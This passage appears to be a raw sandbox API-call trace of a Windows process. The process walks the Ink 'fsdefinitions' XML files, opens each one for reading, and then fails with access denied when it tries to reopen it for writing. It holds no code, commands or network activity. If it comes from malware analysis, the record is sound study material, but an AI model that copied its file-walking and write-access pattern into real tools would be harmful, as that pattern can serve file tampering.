shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.478] GetLastError () returned 0x5 [0083.478] GetLastError () returned 0x5 [0083.479] SetLastError (dwErrCode=0x5) [0083.479] GetLastError () returned 0x5 [0083.479] SetLastError (dwErrCode=0x5) [0083.479] GetLastError () returned 0x5 [0083.479] SetLastError (dwErrCode=0x5) [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0083.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.479] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0083.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0083.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0083.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.480] AreFileApisANSI () returned 1 [0083.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpUsedDefaultChar=0x0) returned 83 [0083.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0083.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.480] AreFileApisANSI () returned 1 [0083.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0083.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 83 [0083.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.480] GetFileType (hFile=0x340) returned 0x1 [0083.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0083.481] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.481] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.481] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.481] CloseHandle (hObject=0x340) returned 1 [0083.481] AreFileApisANSI () returned 1 [0083.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0083.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 83 [0083.481] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.481] GetLastError () returned 0x5 [0083.482] GetLastError () returned 0x5 [0083.482] SetLastError (dwErrCode=0x5) [0083.482] GetLastError () returned 0x5 [0083.482] SetLastError (dwErrCode=0x5) [0083.482] GetLastError () returned 0x5 [0083.482] SetLastError (dwErrCode=0x5) [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0083.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0083.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0083.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0083.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.483] AreFileApisANSI () returned 1 [0083.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpUsedDefaultChar=0x0) returned 83 [0083.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0083.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.483] AreFileApisANSI () returned 1 [0083.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0083.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5fdc8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 83 [0083.483] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.483] GetFileType (hFile=0x340) returned 0x1 [0083.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0083.484] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.484] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.484] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.484] CloseHandle (hObject=0x340) returned 1 [0083.484] AreFileApisANSI () returned 1 [0083.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0083.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 83 [0083.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.484] GetLastError () returned 0x5 [0083.484] GetLastError () returned 0x5 [0083.485] SetLastError (dwErrCode=0x5) [0083.485] GetLastError () returned 0x5 [0083.485] SetLastError (dwErrCode=0x5) [0083.485] GetLastError () returned 0x5 [0083.485] SetLastError (dwErrCode=0x5) [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0083.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.485] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0083.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.486] AreFileApisANSI () returned 1 [0083.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpUsedDefaultChar=0x0) returned 80 [0083.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0083.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.486] AreFileApisANSI () returned 1 [0083.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0083.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 80 [0083.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.486] GetFileType (hFile=0x340) returned 0x1 [0083.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.487] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.487] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.487] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.487] CloseHandle (hObject=0x340) returned 1 [0083.487] AreFileApisANSI () returned 1 [0083.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0083.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 80 [0083.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: 